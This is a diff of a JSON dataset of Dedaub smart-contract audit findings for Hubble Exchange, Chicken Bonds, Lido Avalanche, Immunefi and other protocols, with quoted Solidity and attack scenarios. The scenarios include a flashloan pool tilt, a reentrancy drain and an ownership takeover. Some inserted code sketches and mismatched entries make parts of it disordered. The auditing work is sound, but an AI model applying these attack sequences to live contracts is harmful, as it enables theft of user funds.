Still scaled at e18 unscaledPriceMantissa * config.baseUnit / expScale : (mathematically, not in integer arithmetic) price of 1 token relative to baseUnit of the other, scaled at 1 unscaledPriceMantissa * conversionFactor * config.baseUnit / ethBaseUnit / expScale : in the case of ETH-USDC, conversionFactor is ethBaseUnit, and the above happens to return 1 ETH's price in USDC with 6 decimals of precision, just because the USDC unit has 6 decimals; in the case of other tokens, the conversionFactor is the 6-decimal ETH-USDC price, hence the result is the price of 1 token relative to 1 ETH, at 6-decimal precision.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "can be reused ACKNOWLEDGED The following code shared by methods MarginAccount::liquidateExactRepay and MarginAccount::liquidateExactSeize can be factored out in a separate method and reused: clearingHouse.updatePositions(trader); // credits/debits funding LiquidationBuffer memory buffer = _getLiquidationInfo(trader, idx); if (buffer.status != IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE) { revert NOT_LIQUIDATABLE(buffer.status); } In addition, all the code of AMM::isOverSpreadLimit: function isOverSpreadLimit() external view returns(bool) { if (ammState != AMMState.Active) return false; uint oraclePrice = uint(oracle.getUnderlyingPrice(underlyingAsset)); uint markPrice = lastPrice(); uint oracleSpreadRatioAbs; if (markPrice > oraclePrice) { oracleSpreadRatioAbs = markPrice - oraclePrice; } else { oracleSpreadRatioAbs = oraclePrice - markPrice; } oracleSpreadRatioAbs = oracleSpreadRatioAbs * 100 / oraclePrice; if (oracleSpreadRatioAbs >= maxOracleSpreadRatio) { return true; } return false; } except line uint markPrice = lastPrice(); can be factored out in another method, e.g., _isOverSpreadLimit(uint markPrice), which will have markPrice as an argument. Then method _isOverSpreadLimit can be reused in methods _short and _long.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "warning RESOLVED The Solidity compiler is issuing a warning for the UniswapAnchoredView::priceInternal function, that the return variable may be unassigned. While this is a false warning, it can be easily suppressed with a simple refactoring of the form: function priceInternal(TokenConfig memory config) internal view returns (uint) { if (config.priceSource == PriceSource.REPORTER) return prices[config.symbolHash].price; else if (config.priceSource == PriceSource.FIXED_USD) return config.fixedPrice; else { uint usdPerEth = prices[ethHash].price; require(usdPerEth > 0, \"ETH price not set, cannot convert to dollars\"); return usdPerEth * config.fixedPrice / ethBaseUnit; } }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "modifiers ACKNOWLEDGED Methods syncDeps of MarginAccount and InsuranceFund could be declared external instead of public.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "code (UniswapConfig::getTokenConfig) RESOLVED The expression: ((isUniswapReversed >> i) & uint256(1)) == 1 ? 
true : false can be shortened to the more elegant: ((isUniswapReversed >> i) & uint256(1)) == 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "code/contracts ACKNOWLEDGED tests/Executor.sol is not used. A12 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.9 which, at the time of writing, has some known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected. CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds, adding AMMs and tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol can: - Blacklist any user. - Set important parameters in the vAMM which change the price of any assets: price_scale, price_oracle, last_prices. This allows the owner to potentially liquidate otherwise healthy positions or enter into bad debt positions. The computation of the Margin Fraction takes into account the weighted collateral, whose weights are going to be decided by governance. Currently the protocol uses NFTs for governance but in the future the decisions will be made through a DAO. Currently, there is no relevant implementation, i.e., the Hubble protocol does not yet offer a governance token. Still, even if the final solution is decentralized, governance should be really careful and methodical when deciding the values of the weights. We believe that another, safer approach would be to alter these weights in a specific way defined by predetermined formulas and allow only small adjustments by the DAO.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "pragma RESOLVED The floating pragma pragma solidity ^0.8.7; is used in most contracts, allowing them to be compiled with any version of the Solidity compiler v0.8.* after, and including, v0.8.7. Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contract deployment (Solidity version 0.8.7 at the audit commit hash). A9 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.7 which, at the time of writing, has some known bugs. We inspected the bugs listed for version 0.8.7 and concluded that the subject code is unaffected", + "title": "Pool deposits can be manipulated for possible gain ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": " RESOLVED (mitigated by commit cf15a5ac: time delay for shifting, limited shift window) The Chicken Bonds protocol gives arbitrary callers the ability to shift liquidity out of the stability pool and into Curve, when the price of LUSD (on Curve) is too high. This can be abused for a financial attack if the protocol (i.e., the B.AMMSP) becomes a major shareholder of stability pool liquidity, as expected. Consider a scenario where the attacker notices a large liquidation coming in. Stability pool shareholders stand to gain up to 10%. The attacker wants to eliminate the B.AMMSP share from the stability pool and receive a larger part of the gains. 
The attacker can tilt the Curve pool (e.g., via flashloan) to get the LUSD price to be outside the acceptable threshold (too high). With a subsequent call to shiftLUSDFromSPToCurve, liquidity gets removed from the stability pool. H2 An attack tilting the Curve pool before a redeem allows the attacker to draw funds from the permanent bucket RESOLVED (commit 900d481a makes all Curve accounting be in virtual/relative terms) There is a Curve-pool-tilt attack upon a redeem operation. The core of the issue is that a storage variable, permanentLUSDInCurve, is maintained between transactions: uint256 private permanentLUSDInCurve; // Yearn Curve LUSD-3CRV vault function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDCurveIncrease = (lusdInCurve - lusdInCurveBefore) * ratioPermanentToOwned / 1e18; permanentLUSDInCurve += permanentLUSDCurveIncrease; ... } function shiftLUSDFromCurveToSP(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDWithdrawn = lusdBalanceDelta * ratioPermanentToOwned / 1e18; permanentLUSDInCurve -= permanentLUSDWithdrawn; ... } The problem is that this quantity does not really reflect current amounts of LUSD in Curve, which are subject to fluctuations due to normal swaps or malicious pool manipulation. The permanentLUSDInCurve is then used in the computation of acquired LUSD in Curve: function getAcquiredLUSDInCurve() public view returns (uint256) { uint256 acquiredLUSDInCurve; // Get the LUSD value of the LUSD-3CRV tokens uint256 totalLUSDInCurve = getTotalLUSDInCurve(); if (totalLUSDInCurve > permanentLUSDInCurve) { acquiredLUSDInCurve = totalLUSDInCurve - permanentLUSDInCurve; } return acquiredLUSDInCurve; } A redeem computes the amount to return to the caller using the above function, as a proportion of the acquired LUSD in Curve: function redeem(uint256 _bLUSDToRedeem, uint256 _minLUSDFromBAMMSPVault) external returns (uint256, uint256) { uint256 acquiredLUSDInCurveToRedeem = getAcquiredLUSDInCurve() * fractionOfBLUSDToRedeem / 1e18; uint256 lusdToWithdrawFromCurve = acquiredLUSDInCurveToRedeem * (1e18 - redemptionFeePercentage) / 1e18; uint256 acquiredLUSDInCurveFee = acquiredLUSDInCurveToRedeem - lusdToWithdrawFromCurve; yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdToWithdrawFromCurve); if (yTokensFromCurveVault > 0) { yearnCurveVault.transfer(msg.sender, yTokensFromCurveVault); } As a result, the attack consists of lowering the price of LUSD in Curve, by swapping a lot of LUSD, so that the Curve pool has a much larger amount of LUSD. The permanentLUSDInCurve remains as stored from the previous transaction and gets subtracted, so that the acquired LUSD in Curve appears to be much higher. The attacker calls redeem and receives a proportion of that amount (minus fees), effectively stealing from the permanent LUSD. The general recommendation is to not store between transactions any amount reflecting Curve balances (either total or partial). If a partial balance is to be kept, it should be kept in relative terms (i.e., a proportion) not absolute token amounts. 
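The recommendation to keep only relative quantities can be made concrete with a small sketch. The names here are ours, not the Chicken Bonds code; it only illustrates the accounting style the report suggests:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// Hedged sketch of the recommendation above. The permanent bucket is
// tracked as a proportion (1e18 = 100%, assumed <= 1e18) of the
// protocol-owned Curve position; the absolute LUSD amount is derived from
// the *current* balance at the moment it is needed, so tilting the pool
// between transactions cannot inflate the apparent acquired portion.
contract RelativeBucketSketch {
    uint256 public permanentShare; // proportion, in 1e18 units

    function permanentLUSD(uint256 totalLUSDInCurveNow) public view returns (uint256) {
        return totalLUSDInCurveNow * permanentShare / 1e18;
    }

    function acquiredLUSD(uint256 totalLUSDInCurveNow) external view returns (uint256) {
        // Both buckets move together with the pool, keeping their ratio fixed.
        return totalLUSDInCurveNow - permanentLUSD(totalLUSDInCurveNow);
    }
}
```

This mirrors the fix actually adopted (commit 900d481a moves all Curve accounting to virtual/relative terms).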
MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", - "Severity: Informational" + "Chicken Bonds", + "Severity: High" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "math operations Status Resolved In contract vArmor.sol functions vArmorToArmor() and armorToVArmor() perform numerical operations without checking for overflow. In vArmorToArmor() overflow of multiplication is not checked: function vArmorToArmor(uint256 _varmor) public view returns(uint256) { if(totalSupply() == 0){ return 0; } return _varmor * armor.balanceOf(address(this)) / totalSupply(); } Similar for armorToVArmor(). These functions are called during deposit and withdraw for calculating token amounts to be transferred, so erroneous results will have a significant impact on the correctness of the protocol. M2 DoS by proposing proposals that need to be voted out quickly Open Any governance token holder can DoS their peers by proposing many unfavorable proposals, which need to be voted out. Voting proposals out will incur more gas fees as these are subject to a deadline (and may be voted down by multiple participants) whereas a proposer can also wait for the optimal time to spend gas. Low Severity ", + "title": "in exponentiation ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": " RESOLVED Iterative exponentiation by squaring (ChickenMath::decPow) could be simplified slightly from: while (n > 1) { if (n % 2 == 0) { x = decMul(x, x); n = n / 2; } else { // if (n % 2 != 0) y = decMul(x, y); x = decMul(x, x); n = (n - 1) / 2; } } to: while (n > 1) { if (n % 2 != 0) { y = decMul(x, y); } x = decMul(x, x); n = n / 2; } We only recommend this change for reasons of elegance, not impact.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Medium" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "and gov privileged users not checked for address zero Status Open In Timelock.sol the addresses of gov and admin are set during the construction of the contract. Requirements for checking non-zero addresses are suggested.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "unnecessary RESOLVED There is an assert statement in _firstChickenIn that is currently unnecessary. function _firstChickenIn(...) internal returns (uint256) { assert(!migration); The function is currently only called under conditions that preclude the assert: if (bLUSDToken.totalSupply() == 0 && !migration) { lusdInBAMMSPVault = _firstChickenIn(bond.startTime, bammLUSDValue, lusdInBAMMSPVault); } More generally, although there is a long-standing software engineering practice encouraging asserts for circumstances that should never arise, we discourage their use in deployed blockchain code, since asserts in the EVM do have a run-time cost.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Low" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "introduce opportunities for reentrancy during swaps Open In vArmor.sol, governance through a simple proposal can add tokenHelpers that are executed whenever a token transfer takes place. 
Token transfers also take place during swaps or other activities like deposits or withdrawals. The opportunity for reentrancy may not be immediately visible, but if this were to be possible, consequences may include the draining of LP pool funds. L3 Proposer can propose multiple proposals (Sybil attack) Open A proposer can propose multiple proposals at the same time, defeating checks to disallow this: 1) Deposit enough $armor in the vArmor pool 2) Propose a proposal 3) Withdraw $armor from vArmor pool 4) Transfer $armor to a different address 5) Repeat The protocol offers the function cancel(uint proposalId) public to mitigate this attack, which proceeds in canceling a proposal if the proposer's votes have fallen below the required threshold. However, this requires some users or the multisig to constantly be in a state of readiness. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "computation of minimum DISMISSED, INVALID (will remove) The minimum computation in the code below has a pre-determined outcome: function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { (uint256 bammLUSDValue, uint256 lusdInBAMMSPVault) = _updateBAMMDebt(); uint256 lusdOwnedInBAMMSPVault = bammLUSDValue - pendingLUSD; // Make sure pending bucket is not moved to Curve, so it can be // withdrawn on chicken out uint256 clampedLUSDToShift = Math.min(_maxLUSDToShift, lusdOwnedInBAMMSPVault); // Make sure there's enough LUSD available in B.Protocol clampedLUSDToShift = Math.min(clampedLUSDToShift, lusdInBAMMSPVault); // Dedaub: the above is unnecessary. _updateBAMMDebt has its first // return value always be <= the second. So, clampedLUSDToShift // (which is <= _bammLUSDValue) will always be <= lusdInBAMMSPVault", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Low" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "type declarations Status Open In contract ArmorGovernor.sol the parameters of several functions are declared as uint256, whereas most numerical variables are declared as uint. We suggest that a single style of declaration is used for clarity and consistency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "in README.md INFO (RESOLVED) Under the section Shifter functions::Spot Price Thresholds, the conditions under which shifts are allowed are incorrect. The correct conditions should read: Shifting from the Curve to SP is possible when the spot price is < x, and must not move the spot price above x. Shifting from SP to the Curve is possible when the spot price is > y, and must not move the spot price below y. A5 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, so as to be confident about the baseline guarantees offered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to affect the correctness of the contracts. CENTRALIZATION ASPECTS The design of the protocol is highly decentralized. The creation of bonds, chickening in/out and redemption of bLUSD tokens is all carried out without any intervention from governance. 
The shifter functions, ChickenBondManager::shiftLUSDFromSPToCurve and ChickenBondManager::shiftLUSDFromCurveToSP, which move LUSD between the Liquity stability pool and the Curve pool, are also public and permissionless. The Yearn Governance address holds control of the protocol's migration mode, which prevents the creation of new bonds, among other changes. There is no way to deactivate migration mode. Although new users will not be able to join the protocol, all current users will still be able to retrieve their funds, either through ChickenBondManager::chickenOut or ChickenBondManager::redeem. Yearn governance decisions are voted on by all YFI token holders and are executed by a 6-of-9 Multisig address.", "labels": [ "Dedaub", - "Armor Governance", + "Chicken Bonds", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "code style regarding subtractions Resolved In contract ArmorGovernor.sol functions cancel() and propose() include the same subtraction operation (block.number - 1) twice but with slightly different implementation. One is executed immediately, while the other uses a safety checking function sub256(). In propose(): require(varmor.getPriorVotes(msg.sender, sub256(block.number, 1)) > proposalThreshold(block.number - 1), Similar in cancel(). Underflow seems unlikely in this case, however we suggest that all subtractions are performed in the same way for consistency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "may irreversibly delete essential data DISMISSED Oracle::setNodeIDList deletes reportsByEpochId[latestEpochId], i.e., the latest epoch data, as they might no longer be valid due to validators being removed from the list. The latest epoch data is supplied to the Oracle contract via the OracleManager, which calls the function Oracle::receiveFinalizedReport and marks that the report for that epoch has been finalized, meaning that it cannot be resubmitted. This information, which might irreversibly get deleted by the Oracle::setNodeIDList, is essential for the ValidatorSelector contract to proceed with the validator selection process. Thus, care should be taken to ensure that Oracle::setNodeIDList isn't called after OracleManager::receiveMemberReport and before ValidatorSelector::getAvailableValidatorsWithCapacity, as such a sequence of calls would leave the system in an invalid state.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "errors in error messages Partially resolved (error in AcceptGov() remains) In contract Timelock.sol functions acceptGov() and setPendingGov() contain a typo in the error messages of a requirement. 
In acceptGov(): require(msg.sender == address(this), \"Timelock::setPendingAdmin: Call must come from Timelock.\"); Should become: require(msg.sender == address(this), \"Timelock::setPendingGov: Call must come from Timelock.\"); Similar for setPendingGov().", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "may revert due to array out-of-bounds error in ValidatorSelector::getAvailableValidatorsWithCapacity RESOLVED Function ValidatorSelector::getAvailableValidatorsWithCapacity retrieves the latest epoch validators from the Oracle in the validators array, computes how many of those satisfy the filtering criteria and then creates an array of that size, result, and traverses again the validators array to populate it. function getAvailableValidatorsWithCapacity(uint256 amount) public view returns (Validator[] memory) { Validator[] memory validators = oracle.getLatestValidators(); uint256 count = 0; for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) count++; } Validator[] memory result = new Validator[](count); for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) // Dedaub: index can get bigger than result.length. // Dedaub: a count variable needs to be used as in the above loop. result[index] = validators[index]; } return result; } However, there is a bug in the implementation that can cause an array out-of-bounds exception at line result[index] = validators[index]. Variable index is in the range [0, validators.length-1], while result.length will be strictly less than validators.length if at least one validator has been filtered out of the initial validators array, thus index might be greater than result.length-1. Consider the scenario where validators = [1, 2] and count (or result.length) is 1 as the validator with id 1 has been filtered out. Then the second loop will traverse the whole validators array and will try to assign the validator with id 2 (array index 1) to result[1], causing an out-of-bounds exception, as result has a length of 1 (can only be assigned to index 0). Using a count variable, similarly to the first loop, would be enough to solve this issue.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "event emitted Resolved In contract Timelock.sol the function setPendingGov() emits a wrong event. emit NewPendingAdmin(pendingGov); Should become emit NewPendingGov(pendingGov);", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "due to the ability of a group to confirm any public key RESOLVED A DoS attack could be possible due to the ability of a group to perform confirmations for any given public key. More specifically, we think that a group with adversary members can front-run the reportGeneratedKey() using a public key which was requested by another group, via requestKeygen(). By doing so, this public key will be confirmed by and assigned to the adversary group. // MpcManager.sol::reportGeneratedKey:214 if (_generatedKeyConfirmedByAll(groupId, generatedPublicKey)) { info.groupId = groupId; info.confirmed = true; ... } This will DoS the system for the benevolent group, which will not be able to perform any further confirmations for this public key. 
// MpcManager.sol::reportGeneratedKey:208 if (info.confirmed) revert AttemptToReconfirmKey(); The adversary group can then proceed with joining the staking request, changing the threshold needed for starting the request (of course in the case where the adversary group has a smaller threshold than the original one). // MpcManager.sol::joinRequest:238 uint256 threshold = _groupThreshold[info.groupId]; However, they don't have to join the request and can leave it pending. Since multiple public keys can be requested for the same group, they can proceed with different keys and different stake requests if they wish to interact with the contracts benevolently for their own benefit. The MpcManager.sol contract has quite a bit of off-chain logic, but we believe that it is valid as an adversary model to assume that groups can not be entirely trusted and that they can act adversely against other benevolent groups. In the opposite scenario, considering all groups as trusted could lead to centralization issues while only the MPC manager can create the groups.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "error messages Resolved In contract Timelock.sol the functions which are admin- or gov-only refer only to admin when it comes to authorization-related error messages. For example, in function queueTransaction() require(msg.sender == admin || msg.sender == gov, \"Timelock::queueTransaction: Call must come from admin.\"); Similar for functions cancelTransaction(), executeTransaction(). We suggest that the error messages are extended to include gov as well.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "can be called by a member of any group with any generated public key RESOLVED MpcManager::reportUTXO() does not contain any checks to ensure that the member which calls it is a member of the group that reported and confirmed the provided genPubKey. This means that a member of any group can call this function with any of the generated public keys, even if the latter has been confirmed by and assigned to another group. By doing so, a group can run reportUTXO() changing the threshold needed for the report to be exported. It is not clear from the specification if allowing any member to call this function with any public key is the desired behaviour or if further checks should be applied.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "code reuse Info In contract vArmor.sol the Checkpoint struct is used to record both account votes (storage variable checkpoints) and the total token supply (storage variable checkpointsTotal) while the struct field is named votes, making the code slightly harder to follow. For example, in function _writeCheckpointTotal we inspect the following checkpointsTotal[nCheckpoints - 1].votes = newTotal; A7 Floating pragma Info Use of a floating pragma: The floating pragma pragma solidity ^0.6.6; is used in the Timelock contract allowing it to be compiled with any version of the Solidity compiler that is greater or equal to v0.6.6 and lower than v0.7.0. 
Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contracts' deployment. ArmorGovernance contract uses pragma solidity ^0.6.12; which can be altered to the identical and simpler pragma solidity 0.6.12;.", + "title": "number of remaining TODO items suggest certain functionality is not implemented RESOLVED There are a number of TODO items spread across the entire codebase and test suite. Most of these TODOs are trivial and the test suite appears to be well developed. However, there is a small number of TODOs that concern checks and invariants and also unimplemented functionality like supporting more types of validator requests. This could mean that further development is needed, which could render the current security assessment partially insufficient. LOW SEVERITY: ID Description ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "adversary can alter the amount in Distributor.deposit Resolved (but since entire VestingNFTReceiver is removed, similar threats need to be considered in the context of the new architecture upon future audits) Distributor::deposit computes the withdrawAmount by comparing the balance before and after the transfer: uint256 initialBalance = _thisBalance(token); if (token == NATIVE_ASSET) { payable(receiver).sendValue(amount); } else { token.safeTransfer(receiver, amount); } uint256 finalBalance = _thisBalance(token); require(initialBalance > finalBalance, \"Distributor: did not withdraw\"); uint256 withdrawAmount = initialBalance - finalBalance; An adversary who controls the deposit of funds to the distributor can start withdrawing, and deposit funds back to the distributor from within his receive hook. This will cause the distributor to register a possibly much smaller withdrawAmount than the amount actually withdrawn. When used in combination with vestingNFTReceiver, an attack can be executed as follows: First, the adversary withdraws an amount from vesting into the distributor, by calling VestingNFTReceiver::withdraw via Distributor::call Then the adversary starts withdrawing the same amount from the distributor (even if the amount is larger than his own share) From within his receive hook, the adversary releases an equal amount (minus 1 wei) from vesting to the distributor (again by calling VestingNFTReceiver::withdraw via Distributor::call) As a result, the distributor registered a withdrawal of just 1 wei, and the adversary can withdraw again. Using the above procedure, an adversary with only 1% share can withdraw all funds from the distributor in a single transaction. An exploit of this vulnerability has been implemented and will be provided together with this report. This vulnerability can be prevented by a cross-contract lock that prevents entering VestingNFTReceiver::withdraw while Distributor::withdraw is active. 
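To make the cross-contract lock idea concrete before the lighter alternative below, here is a hedged sketch. The contract and function names are illustrative, not the audited Immunefi code, and authorization of the two trusted callers is omitted for brevity:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hedged sketch, not the audited code: one lock instance shared by both
// Distributor and VestingNFTReceiver. In a real deployment acquire/release
// must be restricted to the two trusted peer contracts.
contract SharedLock {
    bool private locked;

    function acquire() external {
        require(!locked, "cross-contract reentrancy");
        locked = true;
    }

    function release() external {
        locked = false;
    }
}

// In Distributor.withdraw:        lock.acquire(); ...body...; lock.release();
// In VestingNFTReceiver.withdraw: lock.acquire(); ...body...; lock.release();
// A nested entry into either function while the other is active reverts,
// which blocks the C1 sequence of withdraw-within-withdraw described above.
```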
A lighter (but less robust) solution is to add the following check: require(withdrawAmount >= amount) One should also keep in mind a symmetric but harder to exploit vulnerability: if the victim calls Distributor::withdraw, and in his receive hook triggers some untrusted code (e.g., transfers the received funds), the adversary can do a nested Distributor::withdraw, causing the distributor to register a larger withdrawn amount for the victim than the real one (hence increasing the adversary's share). A nonReentrant guard in Distributor::withdraw prevents this. The general recommendation at the end of C2 also applies here. C2 The adversary can transferOwnership on vestingNFTReceiver Resolved Via Distributor::call, an adversary can call VestingNFTReceiver::transferOwnership to change the ownership to himself, which then allows him to call VestingNFTReceiver::withdraw directly (not via the distributor) and receive all vesting funds. This can be solved by removing the transferOwnership method and baking the owner into the VestingNFTReceiver during initialization. As a general recommendation, having a general-purpose Distributor contract which allows arbitrary interactions with VestingNFTReceiver via Distributor::call makes it much harder to design a safe interface. We recommend using a distributor contract with exactly the needed functionality, possibly even merged with VestingNFTReceiver. This would easily solve C2, and would also make it easy to add a lock that solves C1. High Severity ", "labels": [ "Dedaub", "Immunefi", "Severity: Critical" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "logic error in SumVesting combinator schedule Status Dismissed (intended behavior, assumptions on vesting schedules will be clearly stated) In combinator schedule SumVesting.sol it is implicitly assumed that the result of the sub-controllers for both getVested() and getWeight() is linearly dependent on the input amount: function getVested(CommonParameters calldata input) external pure override returns (uint256 result) { [...] 
for (uint256 i; i < subControllers.length; i++) { IVestingController subController = subControllers[i]; uint256 share = subShares[i]; // Dedaub: should be input.amount * share/totalShares // Dedaub: but the division happens in the end nextInput.amount = share * input.amount; totalShares += share; [...] result += subController.getVested(nextInput); } result /= totalShares; } Thus the whole input amount is passed to all sub-controllers, only to divide the accumulated result amount by totalShares at the very end. While this assumption holds in the case of simple schedules, such as CliffVesting and LinearVesting, it may not hold for more complex ones that may be added in the future. Similarly, an inaccurate input amount is passed to the sub-controllers in functions getContext(), createInitialState() and triggerEvent().", "labels": [ "Dedaub", "Immunefi", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "testing that a transaction succeeded Resolved The following test is taken from test/commentary_tests.js : 
CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) The protocol defines several admin/manager roles that serve to give access to specific functions of certain contracts only to the appropriate entities. The following roles are defined and used: DEFAULT_ADMIN_ROLE ROLE_PAUSE_MANAGER ROLE_FEE_MANAGER ROLE_ORACLE_ADMIN ROLE_VALIDATOR_MANAGER ROLE_MPC_MANAGER ROLE_TREASURY_MANAGER ROLE_PROTOCOL_MANAGER For example, the entity that is assigned the ROLE_MPC_MANAGER is able to call functions MpcManager::createGroup and MpcManager::requestKeygen that are essential for the correct functioning of the MPC component. Multiple roles allow for the distribution of power so that if one entity gets hacked all other functions of the protocol remain unaffected. Of course, this assumes that the protocol team distributes the different roles to separate entities thoughtfully, and it does not completely alleviate centralization issues. The contract MpcManager.sol appears to build on/depend on a lot of off-chain logic that could make it suffer from centralization issues as well. A possible attack scenario is described in issue M3 above that raises the question of credibility for the MPC groups even though they can only be created by the MPC manager. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" + "Lido Avalanche", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "testing that a transaction succeeded Resolved The following test is taken from test/commentary_tests.js : await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)); await expect(Notary.connect(Operator).submitCommentary(BYTES32_ZERO)).to.be.reverted; It seems that the intention of the first line is to test that submitCommentary succeeded without reverting. However this line does not really check anything; the test will pass even if submitCommentary reverts. The correct test would be: await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)).not.to.be.reverted; Many similar cases exist in commentary_tests.js, contract_tests.js and test/distributor_tests.js (and possibly elsewhere). In the following case, adding the .not.to.be.reverted revealed logic errors in the test: it(\"Validating the attestation on disclosed report `AFTER` ATTESTATION_DELAY\", async function () { await Notary.connect(Triager).attest(reportRoot, kk, commit) await expect(Notary.connect(Triager).disclose(reportRoot, key, salt, value, merkleProofval)) const increaseTime = ATTESTATION_DELAY * 60 * 60 // ATTESTION in `hour` format x 60 min x 60 sec await ethers.provider.send(\"evm_increaseTime\", [increaseTime]) // 1. increase block time await ethers.provider.send(\"evm_mine\") // 2. then mine the block ... Here, disclose is executed before the ATTESTATION_DELAY so it should fail, although the test makes it look like it should succeed. The reason why the test passes is that: 1. The await expect(...) line performs no checks 2. Moreover this line does not wait for the transaction to finish, so although disclose is launched before moving time forward, it is executed in a future block, after the time delay, and as a consequence it succeeds. So, if .not.to.be.reverted is added to the await 